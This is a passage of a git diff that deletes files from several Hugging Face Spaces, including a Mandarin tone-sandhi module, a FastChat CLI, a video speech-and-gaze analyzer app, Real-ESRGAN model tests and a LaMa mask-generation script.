'疏忽', '畜生', '生意', '甘蔗', '琵琶', '琢磨', - '琉璃', '玻璃', '玫瑰', '玄乎', '狐狸', '状元', '特务', '牲口', '牙碜', '牌楼', '爽快', - '爱人', '热闹', '烧饼', '烟筒', '烂糊', '点心', '炊帚', '灯笼', '火候', '漂亮', '滑溜', - '溜达', '温和', '清楚', '消息', '浪头', '活泼', '比方', '正经', '欺负', '模糊', '槟榔', - '棺材', '棒槌', '棉花', '核桃', '栅栏', '柴火', '架势', '枕头', '枇杷', '机灵', '本事', - '木头', '木匠', '朋友', '月饼', '月亮', '暖和', '明白', '时候', '新鲜', '故事', '收拾', - '收成', '提防', '挖苦', '挑剔', '指甲', '指头', '拾掇', '拳头', '拨弄', '招牌', '招呼', - '抬举', '护士', '折腾', '扫帚', '打量', '打算', '打点', '打扮', '打听', '打发', '扎实', - '扁担', '戒指', '懒得', '意识', '意思', '情形', '悟性', '怪物', '思量', '怎么', '念头', - '念叨', '快活', '忙活', '志气', '心思', '得罪', '张罗', '弟兄', '开通', '应酬', '庄稼', - '干事', '帮手', '帐篷', '希罕', '师父', '师傅', '巴结', '巴掌', '差事', '工夫', '岁数', - '屁股', '尾巴', '少爷', '小气', '小伙', '将就', '对头', '对付', '寡妇', '家伙', '客气', - '实在', '官司', '学问', '学生', '字号', '嫁妆', '媳妇', '媒人', '婆家', '娘家', '委屈', - '姑娘', '姐夫', '妯娌', '妥当', '妖精', '奴才', '女婿', '头发', '太阳', '大爷', '大方', - '大意', '大夫', '多少', '多么', '外甥', '壮实', '地道', '地方', '在乎', '困难', '嘴巴', - '嘱咐', '嘟囔', '嘀咕', '喜欢', '喇嘛', '喇叭', '商量', '唾沫', '哑巴', '哈欠', '哆嗦', - '咳嗽', '和尚', '告诉', '告示', 
'含糊', '吓唬', '后头', '名字', '名堂', '合同', '吆喝', - '叫唤', '口袋', '厚道', '厉害', '千斤', '包袱', '包涵', '匀称', '勤快', '动静', '动弹', - '功夫', '力气', '前头', '刺猬', '刺激', '别扭', '利落', '利索', '利害', '分析', '出息', - '凑合', '凉快', '冷战', '冤枉', '冒失', '养活', '关系', '先生', '兄弟', '便宜', '使唤', - '佩服', '作坊', '体面', '位置', '似的', '伙计', '休息', '什么', '人家', '亲戚', '亲家', - '交情', '云彩', '事情', '买卖', '主意', '丫头', '丧气', '两口', '东西', '东家', '世故', - '不由', '不在', '下水', '下巴', '上头', '上司', '丈夫', '丈人', '一辈', '那个', '菩萨', - '父亲', '母亲', '咕噜', '邋遢', '费用', '冤家', '甜头', '介绍', '荒唐', '大人', '泥鳅', - '幸福', '熟悉', '计划', '扑腾', '蜡烛', '姥爷', '照顾', '喉咙', '吉他', '弄堂', '蚂蚱', - '凤凰', '拖沓', '寒碜', '糟蹋', '倒腾', '报复', '逻辑', '盘缠', '喽啰', '牢骚', '咖喱', - '扫把', '惦记' - } - self.must_not_neural_tone_words = { - "男子", "女子", "分子", "原子", "量子", "莲子", "石子", "瓜子", "电子", "人人", "虎虎" - } - self.punc = ":,;。?!“”‘’':,;.?!" - - # the meaning of jieba pos tag: https://blog.csdn.net/weixin_44174352/article/details/113731041 - # e.g. - # word: "家里" - # pos: "s" - # finals: ['ia1', 'i3'] - def _neural_sandhi(self, word: str, pos: str, - finals: List[str]) -> List[str]: - - # reduplication words for n. and v. e.g. 奶奶, 试试, 旺旺 - for j, item in enumerate(word): - if j - 1 >= 0 and item == word[j - 1] and pos[0] in { - "n", "v", "a" - } and word not in self.must_not_neural_tone_words: - finals[j] = finals[j][:-1] + "5" - ge_idx = word.find("个") - if len(word) >= 1 and word[-1] in "吧呢啊呐噻嘛吖嗨呐哦哒额滴哩哟喽啰耶喔诶": - finals[-1] = finals[-1][:-1] + "5" - elif len(word) >= 1 and word[-1] in "的地得": - finals[-1] = finals[-1][:-1] + "5" - # e.g. 走了, 看着, 去过 - # elif len(word) == 1 and word in "了着过" and pos in {"ul", "uz", "ug"}: - # finals[-1] = finals[-1][:-1] + "5" - elif len(word) > 1 and word[-1] in "们子" and pos in { - "r", "n" - } and word not in self.must_not_neural_tone_words: - finals[-1] = finals[-1][:-1] + "5" - # e.g. 桌上, 地下, 家里 - elif len(word) > 1 and word[-1] in "上下里" and pos in {"s", "l", "f"}: - finals[-1] = finals[-1][:-1] + "5" - # e.g. 上来, 下去 - elif len(word) > 1 and word[-1] in "来去" and word[-2] in "上下进出回过起开": - finals[-1] = finals[-1][:-1] + "5" - # 个做量词 - elif (ge_idx >= 1 and - (word[ge_idx - 1].isnumeric() or - word[ge_idx - 1] in "几有两半多各整每做是")) or word == '个': - finals[ge_idx] = finals[ge_idx][:-1] + "5" - else: - if word in self.must_neural_tone_words or word[ - -2:] in self.must_neural_tone_words: - finals[-1] = finals[-1][:-1] + "5" - - word_list = self._split_word(word) - finals_list = [finals[:len(word_list[0])], finals[len(word_list[0]):]] - for i, word in enumerate(word_list): - # conventional neural in Chinese - if word in self.must_neural_tone_words or word[ - -2:] in self.must_neural_tone_words: - finals_list[i][-1] = finals_list[i][-1][:-1] + "5" - finals = sum(finals_list, []) - return finals - - def _bu_sandhi(self, word: str, finals: List[str]) -> List[str]: - # e.g. 看不懂 - if len(word) == 3 and word[1] == "不": - finals[1] = finals[1][:-1] + "5" - else: - for i, char in enumerate(word): - # "不" before tone4 should be bu2, e.g. 不怕 - if char == "不" and i + 1 < len(word) and finals[i + - 1][-1] == "4": - finals[i] = finals[i][:-1] + "2" - return finals - - def _yi_sandhi(self, word: str, finals: List[str]) -> List[str]: - # "一" in number sequences, e.g. 一零零, 二一零 - if word.find("一") != -1 and all( - [item.isnumeric() for item in word if item != "一"]): - return finals - # "一" between reduplication words shold be yi5, e.g. 
看一看 - elif len(word) == 3 and word[1] == "一" and word[0] == word[-1]: - finals[1] = finals[1][:-1] + "5" - # when "一" is ordinal word, it should be yi1 - elif word.startswith("第一"): - finals[1] = finals[1][:-1] + "1" - else: - for i, char in enumerate(word): - if char == "一" and i + 1 < len(word): - # "一" before tone4 should be yi2, e.g. 一段 - if finals[i + 1][-1] == "4": - finals[i] = finals[i][:-1] + "2" - # "一" before non-tone4 should be yi4, e.g. 一天 - else: - # "一" 后面如果是标点,还读一声 - if word[i + 1] not in self.punc: - finals[i] = finals[i][:-1] + "4" - return finals - - def _split_word(self, word: str) -> List[str]: - word_list = jieba.cut_for_search(word) - word_list = sorted(word_list, key=lambda i: len(i), reverse=False) - first_subword = word_list[0] - first_begin_idx = word.find(first_subword) - if first_begin_idx == 0: - second_subword = word[len(first_subword):] - new_word_list = [first_subword, second_subword] - else: - second_subword = word[:-len(first_subword)] - new_word_list = [second_subword, first_subword] - return new_word_list - - def _three_sandhi(self, word: str, finals: List[str]) -> List[str]: - if len(word) == 2 and self._all_tone_three(finals): - finals[0] = finals[0][:-1] + "2" - elif len(word) == 3: - word_list = self._split_word(word) - if self._all_tone_three(finals): - # disyllabic + monosyllabic, e.g. 蒙古/包 - if len(word_list[0]) == 2: - finals[0] = finals[0][:-1] + "2" - finals[1] = finals[1][:-1] + "2" - # monosyllabic + disyllabic, e.g. 纸/老虎 - elif len(word_list[0]) == 1: - finals[1] = finals[1][:-1] + "2" - else: - finals_list = [ - finals[:len(word_list[0])], finals[len(word_list[0]):] - ] - if len(finals_list) == 2: - for i, sub in enumerate(finals_list): - # e.g. 所有/人 - if self._all_tone_three(sub) and len(sub) == 2: - finals_list[i][0] = finals_list[i][0][:-1] + "2" - # e.g. 好/喜欢 - elif i == 1 and not self._all_tone_three(sub) and finals_list[i][0][-1] == "3" and \ - finals_list[0][-1][-1] == "3": - - finals_list[0][-1] = finals_list[0][-1][:-1] + "2" - finals = sum(finals_list, []) - # split idiom into two words who's length is 2 - elif len(word) == 4: - finals_list = [finals[:2], finals[2:]] - finals = [] - for sub in finals_list: - if self._all_tone_three(sub): - sub[0] = sub[0][:-1] + "2" - finals += sub - - return finals - - def _all_tone_three(self, finals: List[str]) -> bool: - return all(x[-1] == "3" for x in finals) - - # merge "不" and the word behind it - # if don't merge, "不" sometimes appears alone according to jieba, which may occur sandhi error - def _merge_bu(self, seg: List[Tuple[str, str]]) -> List[Tuple[str, str]]: - new_seg = [] - last_word = "" - for word, pos in seg: - if last_word == "不": - word = last_word + word - if word != "不": - new_seg.append((word, pos)) - last_word = word[:] - if last_word == "不": - new_seg.append((last_word, 'd')) - last_word = "" - return new_seg - - # function 1: merge "一" and reduplication words in it's left and right, e.g. "听","一","听" ->"听一听" - # function 2: merge single "一" and the word behind it - # if don't merge, "一" sometimes appears alone according to jieba, which may occur sandhi error - # e.g. 
- # input seg: [('听', 'v'), ('一', 'm'), ('听', 'v')] - # output seg: [['听一听', 'v']] - def _merge_yi(self, seg: List[Tuple[str, str]]) -> List[Tuple[str, str]]: - new_seg = [] - # function 1 - for i, (word, pos) in enumerate(seg): - if i - 1 >= 0 and word == "一" and i + 1 < len(seg) and seg[i - 1][ - 0] == seg[i + 1][0] and seg[i - 1][1] == "v": - new_seg[i - 1][0] = new_seg[i - 1][0] + "一" + new_seg[i - 1][0] - else: - if i - 2 >= 0 and seg[i - 1][0] == "一" and seg[i - 2][ - 0] == word and pos == "v": - continue - else: - new_seg.append([word, pos]) - seg = new_seg - new_seg = [] - # function 2 - for i, (word, pos) in enumerate(seg): - if new_seg and new_seg[-1][0] == "一": - new_seg[-1][0] = new_seg[-1][0] + word - else: - new_seg.append([word, pos]) - return new_seg - - # the first and the second words are all_tone_three - def _merge_continuous_three_tones( - self, seg: List[Tuple[str, str]]) -> List[Tuple[str, str]]: - new_seg = [] - sub_finals_list = [ - lazy_pinyin( - word, neutral_tone_with_five=True, style=Style.FINALS_TONE3) - for (word, pos) in seg - ] - assert len(sub_finals_list) == len(seg) - merge_last = [False] * len(seg) - for i, (word, pos) in enumerate(seg): - if i - 1 >= 0 and self._all_tone_three( - sub_finals_list[i - 1]) and self._all_tone_three( - sub_finals_list[i]) and not merge_last[i - 1]: - # if the last word is reduplication, not merge, because reduplication need to be _neural_sandhi - if not self._is_reduplication(seg[i - 1][0]) and len( - seg[i - 1][0]) + len(seg[i][0]) <= 3: - new_seg[-1][0] = new_seg[-1][0] + seg[i][0] - merge_last[i] = True - else: - new_seg.append([word, pos]) - else: - new_seg.append([word, pos]) - - return new_seg - - def _is_reduplication(self, word: str) -> bool: - return len(word) == 2 and word[0] == word[1] - - # the last char of first word and the first char of second word is tone_three - def _merge_continuous_three_tones_2( - self, seg: List[Tuple[str, str]]) -> List[Tuple[str, str]]: - new_seg = [] - sub_finals_list = [ - lazy_pinyin( - word, neutral_tone_with_five=True, style=Style.FINALS_TONE3) - for (word, pos) in seg - ] - assert len(sub_finals_list) == len(seg) - merge_last = [False] * len(seg) - for i, (word, pos) in enumerate(seg): - if i - 1 >= 0 and sub_finals_list[i - 1][-1][-1] == "3" and sub_finals_list[i][0][-1] == "3" and not \ - merge_last[i - 1]: - # if the last word is reduplication, not merge, because reduplication need to be _neural_sandhi - if not self._is_reduplication(seg[i - 1][0]) and len( - seg[i - 1][0]) + len(seg[i][0]) <= 3: - new_seg[-1][0] = new_seg[-1][0] + seg[i][0] - merge_last[i] = True - else: - new_seg.append([word, pos]) - else: - new_seg.append([word, pos]) - return new_seg - - def _merge_er(self, seg: List[Tuple[str, str]]) -> List[Tuple[str, str]]: - new_seg = [] - for i, (word, pos) in enumerate(seg): - if i - 1 >= 0 and word == "儿" and seg[i-1][0] != "#": - new_seg[-1][0] = new_seg[-1][0] + seg[i][0] - else: - new_seg.append([word, pos]) - return new_seg - - def _merge_reduplication( - self, seg: List[Tuple[str, str]]) -> List[Tuple[str, str]]: - new_seg = [] - for i, (word, pos) in enumerate(seg): - if new_seg and word == new_seg[-1][0]: - new_seg[-1][0] = new_seg[-1][0] + seg[i][0] - else: - new_seg.append([word, pos]) - return new_seg - - def pre_merge_for_modify( - self, seg: List[Tuple[str, str]]) -> List[Tuple[str, str]]: - seg = self._merge_bu(seg) - try: - seg = self._merge_yi(seg) - except: - print("_merge_yi failed") - seg = self._merge_reduplication(seg) - seg = 
self._merge_continuous_three_tones(seg) - seg = self._merge_continuous_three_tones_2(seg) - seg = self._merge_er(seg) - return seg - - def modified_tone(self, word: str, pos: str, - finals: List[str]) -> List[str]: - finals = self._bu_sandhi(word, finals) - finals = self._yi_sandhi(word, finals) - finals = self._neural_sandhi(word, pos, finals) - finals = self._three_sandhi(word, finals) - return finals diff --git a/spaces/XzJosh/Jiaran-Bert-VITS2/monotonic_align/__init__.py b/spaces/XzJosh/Jiaran-Bert-VITS2/monotonic_align/__init__.py deleted file mode 100644 index 75603d26cf2b8d6196f5a68a89f9e49d8e519bc8..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/Jiaran-Bert-VITS2/monotonic_align/__init__.py +++ /dev/null @@ -1,15 +0,0 @@ -from numpy import zeros, int32, float32 -from torch import from_numpy - -from .core import maximum_path_jit - -def maximum_path(neg_cent, mask): - device = neg_cent.device - dtype = neg_cent.dtype - neg_cent = neg_cent.data.cpu().numpy().astype(float32) - path = zeros(neg_cent.shape, dtype=int32) - - t_t_max = mask.sum(1)[:, 0].data.cpu().numpy().astype(int32) - t_s_max = mask.sum(2)[:, 0].data.cpu().numpy().astype(int32) - maximum_path_jit(path, neg_cent, t_t_max, t_s_max) - return from_numpy(path).to(device=device, dtype=dtype) diff --git a/spaces/Yiqin/ChatVID/model/fastchat/serve/cli.py b/spaces/Yiqin/ChatVID/model/fastchat/serve/cli.py deleted file mode 100644 index cb4a485fc2dd2ab2605f5650cc08984912a3f3ce..0000000000000000000000000000000000000000 --- a/spaces/Yiqin/ChatVID/model/fastchat/serve/cli.py +++ /dev/null @@ -1,172 +0,0 @@ -""" -Chat with a model with command line interface. - -Usage: -python3 -m fastchat.serve.cli --model ~/model_weights/llama-7b -""" -import argparse -import os -import re - -from prompt_toolkit import PromptSession -from prompt_toolkit.auto_suggest import AutoSuggestFromHistory -from prompt_toolkit.completion import WordCompleter -from prompt_toolkit.history import InMemoryHistory -from rich.console import Console -from rich.markdown import Markdown -from rich.live import Live - -from fastchat.serve.inference import chat_loop, ChatIO - - -class SimpleChatIO(ChatIO): - def prompt_for_input(self, role) -> str: - return input(f"{role}: ") - - def prompt_for_output(self, role: str): - print(f"{role}: ", end="", flush=True) - - def stream_output(self, output_stream, skip_echo_len: int): - pre = 0 - for outputs in output_stream: - outputs = outputs[skip_echo_len:].strip() - outputs = outputs.split(" ") - now = len(outputs) - 1 - if now > pre: - print(" ".join(outputs[pre:now]), end=" ", flush=True) - pre = now - print(" ".join(outputs[pre:]), flush=True) - return " ".join(outputs) - - -class RichChatIO(ChatIO): - def __init__(self): - self._prompt_session = PromptSession(history=InMemoryHistory()) - self._completer = WordCompleter( - words=["!exit", "!reset"], pattern=re.compile("$") - ) - self._console = Console() - - def prompt_for_input(self, role) -> str: - self._console.print(f"[bold]{role}:") - # TODO(suquark): multiline input has some issues. fix it later. 
- prompt_input = self._prompt_session.prompt( - completer=self._completer, - multiline=False, - auto_suggest=AutoSuggestFromHistory(), - key_bindings=None, - ) - self._console.print() - return prompt_input - - def prompt_for_output(self, role: str): - self._console.print(f"[bold]{role}:") - - def stream_output(self, output_stream, skip_echo_len: int): - """Stream output from a role.""" - # TODO(suquark): the console flickers when there is a code block - # above it. We need to cut off "live" when a code block is done. - - # Create a Live context for updating the console output - with Live(console=self._console, refresh_per_second=4) as live: - # Read lines from the stream - for outputs in output_stream: - accumulated_text = outputs[skip_echo_len:] - if not accumulated_text: - continue - # Render the accumulated text as Markdown - # NOTE: this is a workaround for the rendering "unstandard markdown" - # in rich. The chatbots output treat "\n" as a new line for - # better compatibility with real-world text. However, rendering - # in markdown would break the format. It is because standard markdown - # treat a single "\n" in normal text as a space. - # Our workaround is adding two spaces at the end of each line. - # This is not a perfect solution, as it would - # introduce trailing spaces (only) in code block, but it works well - # especially for console output, because in general the console does not - # care about trailing spaces. - lines = [] - for line in accumulated_text.splitlines(): - lines.append(line) - if line.startswith("```"): - # Code block marker - do not add trailing spaces, as it would - # break the syntax highlighting - lines.append("\n") - else: - lines.append(" \n") - markdown = Markdown("".join(lines)) - # Update the Live console output - live.update(markdown) - self._console.print() - return outputs[skip_echo_len:] - - -def main(args): - if args.gpus: - if args.num_gpus and len(args.gpus.split(",")) < int(args.num_gpus): - raise ValueError(f"Larger --num-gpus ({args.num_gpus}) than --gpus {args.gpus}!") - os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus - if args.style == "simple": - chatio = SimpleChatIO() - elif args.style == "rich": - chatio = RichChatIO() - else: - raise ValueError(f"Invalid style for console: {args.style}") - try: - chat_loop( - args.model_path, - args.device, - args.num_gpus, - args.max_gpu_memory, - args.load_8bit, - args.conv_template, - args.temperature, - args.max_new_tokens, - chatio, - args.debug, - ) - except KeyboardInterrupt: - print("exit...") - - -if __name__ == "__main__": - parser = argparse.ArgumentParser() - parser.add_argument( - "--model-path", - type=str, - default="facebook/opt-350m", - help="The path to the weights", - ) - parser.add_argument( - "--device", type=str, choices=["cpu", "cuda", "mps"], default="cuda" - ) - parser.add_argument( - "--gpus", - type=str, - default=None, - help="A single GPU like 1 or multiple GPUs like 0,2" - ) - parser.add_argument("--num-gpus", type=str, default="1") - parser.add_argument( - "--max-gpu-memory", - type=str, - help="The maximum memory per gpu. Use a string like '13Gib'", - ) - parser.add_argument( - "--load-8bit", action="store_true", help="Use 8-bit quantization." - ) - parser.add_argument( - "--conv-template", type=str, default=None, help="Conversation prompt template." 
- ) - parser.add_argument("--temperature", type=float, default=0.7) - parser.add_argument("--max-new-tokens", type=int, default=512) - parser.add_argument( - "--style", - type=str, - default="simple", - choices=["simple", "rich"], - help="Display style.", - ) - parser.add_argument("--debug", action="store_true") - args = parser.parse_args() - main(args) diff --git a/spaces/abrar-adnan/speech-analyzer/app.py b/spaces/abrar-adnan/speech-analyzer/app.py deleted file mode 100644 index 0c1934cdcbb7a2f066c69df3918b390b6ec33eb2..0000000000000000000000000000000000000000 --- a/spaces/abrar-adnan/speech-analyzer/app.py +++ /dev/null @@ -1,193 +0,0 @@ -import gradio as gr -import os -import cv2 -import face_recognition -from fastai.vision.all import load_learner -import time -import base64 -from deepface import DeepFace -import torchaudio -import moviepy.editor as mp -from transformers import WhisperProcessor, WhisperForConditionalGeneration, pipeline - -# import pathlib -# temp = pathlib.PosixPath -# pathlib.PosixPath = pathlib.WindowsPath - -backends = [ - 'opencv', - 'ssd', - 'dlib', - 'mtcnn', - 'retinaface', - 'mediapipe' -] - -emotion_pipeline = pipeline("text-classification", model="j-hartmann/emotion-english-distilroberta-base", return_all_scores=True) -sentiment_pipeline = pipeline("sentiment-analysis", model="distilbert-base-uncased-finetuned-sst-2-english") - -model = load_learner("gaze-recognizer-v4.pkl") - -def analyze_emotion(text): - result = emotion_pipeline(text) - return result - -def analyze_sentiment(text): - result = sentiment_pipeline(text) - return result - -def getTranscription(path): - # Insert Local Video File Path - clip = mp.VideoFileClip(path) - - # Insert Local Audio File Path - clip.audio.write_audiofile(r"audio.wav") - - waveform, sample_rate = torchaudio.load("audio.wav") - resampler = torchaudio.transforms.Resample(sample_rate, 16000) - waveform = resampler(waveform)[0] - - processor = WhisperProcessor.from_pretrained("openai/whisper-tiny") - model = WhisperForConditionalGeneration.from_pretrained("openai/whisper-tiny") - model.config.forced_decoder_ids = None - - input_features = processor(waveform.squeeze(dim=0), return_tensors="pt").input_features - predicted_ids = model.generate(input_features) - - transcription = processor.batch_decode(predicted_ids, skip_special_tokens=True) - - return transcription[0] - -def video_processing(video_file, encoded_video): - emotion_count = 0 - video_emotions = { - 'angry': 0, - 'disgust': 0, - 'fear': 0, - 'happy': 0, - 'sad': 0, - 'surprise': 0, - 'neutral':0 - } - - if encoded_video != "": - - decoded_file_data = base64.b64decode(encoded_video) - - with open("temp_video.mp4", "wb") as f: - f.write(decoded_file_data) - - video_file = "temp_video.mp4" - - start_time = time.time() - - transcription = getTranscription(video_file) - print(transcription) - text_emotion = analyze_emotion(transcription) - print(text_emotion) - text_sentiment = analyze_sentiment(transcription) - print(text_sentiment) - - video_capture = cv2.VideoCapture(video_file) - on_camera = 0 - off_camera = 0 - total = 0 - - while True: - # Read a single frame from the video - for i in range(24*3): - ret, frame = video_capture.read() - if not ret: - break - - # If there are no more frames, break out of the loop - if not ret: - break - - # Convert the frame to RGB color (face_recognition uses RGB) - gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) - - # Find all the faces in the frame using a pre-trained convolutional neural network. 
- face_locations = face_recognition.face_locations(gray) - - if len(face_locations) > 0: - # Show the original frame with face rectangles drawn around the faces - for top, right, bottom, left in face_locations: - # cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2) - face_image = gray[top:bottom, left:right] - color_image = frame[top:bottom, left:right] - - # Resize the face image to the desired size - resized_face_image = cv2.resize(face_image, (128,128)) - - try: - detected_face_emotion = DeepFace.analyze(color_image,actions=['emotion'],detector_backend = backends[2],enforce_detection = False)# 2,3, 4 works - for emotion in detected_face_emotion: - for key in video_emotions.keys(): - video_emotions[key] += emotion['emotion'][key] - emotion_count += 1 - except Exception as e: - emotion = 0 - pass - - # Predict the class of the resized face image using the model - result = model.predict(resized_face_image) - print(result[0]) - if result[0] == 'on_camera': - on_camera += 1 - elif result[0] == 'off_camera': - off_camera += 1 - total += 1 - - try: - # your processing code here - gaze_percentage = on_camera / total * 100 - except Exception as e: - print(f"An error occurred while processing the video: {e}") - gaze_percentage = 'ERROR : no face detected' - print(f'Total = {total},on_camera = {on_camera},off_camera = {off_camera}') - # Release the video capture object and close all windows - video_capture.release() - cv2.destroyAllWindows() - end_time = time.time() - print(f'Time taken: {end_time-start_time}') - if os.path.exists("temp_video.mp4"): - os.remove("temp_video.mp4") - if os.path.exists("audio.wav"): - os.remove("audio.wav") - print(gaze_percentage) - - # Divide all emotion values by emotion count - if emotion_count > 0: - for key in video_emotions.keys(): - video_emotions[key] /= emotion_count - - - # Modify 'angry' key to 'anger' - video_emotions['anger'] = video_emotions.pop('angry') - - # Modify 'happy' key to 'joy' - video_emotions['joy'] = video_emotions.pop('happy') - - # Modify 'sad' key to 'sadness' - video_emotions['sadness'] = video_emotions.pop('sad') - - - - final_result_dict = { - "gaze_percentage" : gaze_percentage, - "face_emotion" : video_emotions, - "text_emotion" : text_emotion[0], - "transcription" : transcription, - "text_sentiment" : text_sentiment - } - - return final_result_dict - - -demo = gr.Interface(fn=video_processing, - inputs=["video", "text"], - outputs="json") - -if __name__ == "__main__": - demo.launch() \ No newline at end of file diff --git a/spaces/akdeniz27/pix2struct-DocVQA/README.md b/spaces/akdeniz27/pix2struct-DocVQA/README.md deleted file mode 100644 index 4319641794d87e1962d54e21c66b79e55240b78b..0000000000000000000000000000000000000000 --- a/spaces/akdeniz27/pix2struct-DocVQA/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Pix2struct DocVQA -emoji: 🏢 -colorFrom: yellow -colorTo: blue -sdk: gradio -sdk_version: 3.23.0 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/akhaliq/Real-ESRGAN/tests/test_model.py b/spaces/akhaliq/Real-ESRGAN/tests/test_model.py deleted file mode 100644 index c20bb1d56ed20222e929e9c94026f6ea383c6026..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/Real-ESRGAN/tests/test_model.py +++ /dev/null @@ -1,126 +0,0 @@ -import torch -import yaml -from basicsr.archs.rrdbnet_arch import RRDBNet -from basicsr.data.paired_image_dataset import PairedImageDataset -from 
basicsr.losses.losses import GANLoss, L1Loss, PerceptualLoss - -from realesrgan.archs.discriminator_arch import UNetDiscriminatorSN -from realesrgan.models.realesrgan_model import RealESRGANModel -from realesrgan.models.realesrnet_model import RealESRNetModel - - -def test_realesrnet_model(): - with open('tests/data/test_realesrnet_model.yml', mode='r') as f: - opt = yaml.load(f, Loader=yaml.FullLoader) - - # build model - model = RealESRNetModel(opt) - # test attributes - assert model.__class__.__name__ == 'RealESRNetModel' - assert isinstance(model.net_g, RRDBNet) - assert isinstance(model.cri_pix, L1Loss) - assert isinstance(model.optimizers[0], torch.optim.Adam) - - # prepare data - gt = torch.rand((1, 3, 32, 32), dtype=torch.float32) - kernel1 = torch.rand((1, 5, 5), dtype=torch.float32) - kernel2 = torch.rand((1, 5, 5), dtype=torch.float32) - sinc_kernel = torch.rand((1, 5, 5), dtype=torch.float32) - data = dict(gt=gt, kernel1=kernel1, kernel2=kernel2, sinc_kernel=sinc_kernel) - model.feed_data(data) - # check dequeue - model.feed_data(data) - # check data shape - assert model.lq.shape == (1, 3, 8, 8) - assert model.gt.shape == (1, 3, 32, 32) - - # change probability to test if-else - model.opt['gaussian_noise_prob'] = 0 - model.opt['gray_noise_prob'] = 0 - model.opt['second_blur_prob'] = 0 - model.opt['gaussian_noise_prob2'] = 0 - model.opt['gray_noise_prob2'] = 0 - model.feed_data(data) - # check data shape - assert model.lq.shape == (1, 3, 8, 8) - assert model.gt.shape == (1, 3, 32, 32) - - # ----------------- test nondist_validation -------------------- # - # construct dataloader - dataset_opt = dict( - name='Demo', - dataroot_gt='tests/data/gt', - dataroot_lq='tests/data/lq', - io_backend=dict(type='disk'), - scale=4, - phase='val') - dataset = PairedImageDataset(dataset_opt) - dataloader = torch.utils.data.DataLoader(dataset=dataset, batch_size=1, shuffle=False, num_workers=0) - assert model.is_train is True - model.nondist_validation(dataloader, 1, None, False) - assert model.is_train is True - - -def test_realesrgan_model(): - with open('tests/data/test_realesrgan_model.yml', mode='r') as f: - opt = yaml.load(f, Loader=yaml.FullLoader) - - # build model - model = RealESRGANModel(opt) - # test attributes - assert model.__class__.__name__ == 'RealESRGANModel' - assert isinstance(model.net_g, RRDBNet) # generator - assert isinstance(model.net_d, UNetDiscriminatorSN) # discriminator - assert isinstance(model.cri_pix, L1Loss) - assert isinstance(model.cri_perceptual, PerceptualLoss) - assert isinstance(model.cri_gan, GANLoss) - assert isinstance(model.optimizers[0], torch.optim.Adam) - assert isinstance(model.optimizers[1], torch.optim.Adam) - - # prepare data - gt = torch.rand((1, 3, 32, 32), dtype=torch.float32) - kernel1 = torch.rand((1, 5, 5), dtype=torch.float32) - kernel2 = torch.rand((1, 5, 5), dtype=torch.float32) - sinc_kernel = torch.rand((1, 5, 5), dtype=torch.float32) - data = dict(gt=gt, kernel1=kernel1, kernel2=kernel2, sinc_kernel=sinc_kernel) - model.feed_data(data) - # check dequeue - model.feed_data(data) - # check data shape - assert model.lq.shape == (1, 3, 8, 8) - assert model.gt.shape == (1, 3, 32, 32) - - # change probability to test if-else - model.opt['gaussian_noise_prob'] = 0 - model.opt['gray_noise_prob'] = 0 - model.opt['second_blur_prob'] = 0 - model.opt['gaussian_noise_prob2'] = 0 - model.opt['gray_noise_prob2'] = 0 - model.feed_data(data) - # check data shape - assert model.lq.shape == (1, 3, 8, 8) - assert model.gt.shape == (1, 3, 32, 32) - - # 
----------------- test nondist_validation -------------------- # - # construct dataloader - dataset_opt = dict( - name='Demo', - dataroot_gt='tests/data/gt', - dataroot_lq='tests/data/lq', - io_backend=dict(type='disk'), - scale=4, - phase='val') - dataset = PairedImageDataset(dataset_opt) - dataloader = torch.utils.data.DataLoader(dataset=dataset, batch_size=1, shuffle=False, num_workers=0) - assert model.is_train is True - model.nondist_validation(dataloader, 1, None, False) - assert model.is_train is True - - # ----------------- test optimize_parameters -------------------- # - model.feed_data(data) - model.optimize_parameters(1) - assert model.output.shape == (1, 3, 32, 32) - assert isinstance(model.log_dict, dict) - # check returned keys - expected_keys = ['l_g_pix', 'l_g_percep', 'l_g_gan', 'l_d_real', 'out_d_real', 'l_d_fake', 'out_d_fake'] - assert set(expected_keys).issubset(set(model.log_dict.keys())) diff --git a/spaces/akhaliq/lama/bin/gen_debug_mask_dataset.py b/spaces/akhaliq/lama/bin/gen_debug_mask_dataset.py deleted file mode 100644 index 738f76875c82aa412063bb5bff15e69c46f20362..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/lama/bin/gen_debug_mask_dataset.py +++ /dev/null @@ -1,61 +0,0 @@ -#!/usr/bin/env python3 - -import glob -import os - -import PIL.Image as Image -import cv2 -import numpy as np -import tqdm -import shutil - - -from saicinpainting.evaluation.utils import load_yaml - - -def generate_masks_for_img(infile, outmask_pattern, mask_size=200, step=0.5): - inimg = Image.open(infile) - width, height = inimg.size - step_abs = int(mask_size * step) - - mask = np.zeros((height, width), dtype='uint8') - mask_i = 0 - - for start_vertical in range(0, height - step_abs, step_abs): - for start_horizontal in range(0, width - step_abs, step_abs): - mask[start_vertical:start_vertical + mask_size, start_horizontal:start_horizontal + mask_size] = 255 - - cv2.imwrite(outmask_pattern.format(mask_i), mask) - - mask[start_vertical:start_vertical + mask_size, start_horizontal:start_horizontal + mask_size] = 0 - mask_i += 1 - - -def main(args): - if not args.indir.endswith('/'): - args.indir += '/' - if not args.outdir.endswith('/'): - args.outdir += '/' - - config = load_yaml(args.config) - - in_files = list(glob.glob(os.path.join(args.indir, '**', f'*{config.img_ext}'), recursive=True)) - for infile in tqdm.tqdm(in_files): - outimg = args.outdir + infile[len(args.indir):] - outmask_pattern = outimg[:-len(config.img_ext)] + '_mask{:04d}.png' - - os.makedirs(os.path.dirname(outimg), exist_ok=True) - shutil.copy2(infile, outimg) - - generate_masks_for_img(infile, outmask_pattern, **config.gen_kwargs) - - -if __name__ == '__main__': - import argparse - - aparser = argparse.ArgumentParser() - aparser.add_argument('config', type=str, help='Path to config for dataset generation') - aparser.add_argument('indir', type=str, help='Path to folder with images') - aparser.add_argument('outdir', type=str, help='Path to folder to store aligned images and masks to') - - main(aparser.parse_args()) diff --git 